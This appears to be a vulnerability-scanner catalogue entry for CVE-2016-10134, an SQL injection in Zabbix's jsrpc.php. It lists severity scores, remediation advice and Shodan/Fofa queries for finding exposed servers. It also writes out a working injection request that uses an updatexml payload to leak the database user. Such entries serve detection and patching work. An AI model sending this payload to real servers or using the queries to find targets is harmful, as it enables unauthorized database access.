| Title | Zabbix - SQL Injection |
|---|---|
| Author | princechaddha |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems. |
| Remediation | Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134). |
| CVSS Score | 9.8 |
| EPSS Score | 0.88001 |
| CVE ID | CVE-2016-10134 |
| CWE ID | CWE-89 |
| Shodan Query | http.favicon.hash:892542951http.title:"zabbix-server"cpe:"cpe:2.3:a:zabbix:zabbix" |
| Fofa Query | icon_hash=892542951app="zabbix-监控系统" && body="saml"title="zabbix-server" |
| Tags | cve2016 cve zabbix sqli vulhub vuln |
Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10134.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-10134.pcap
N/AN/A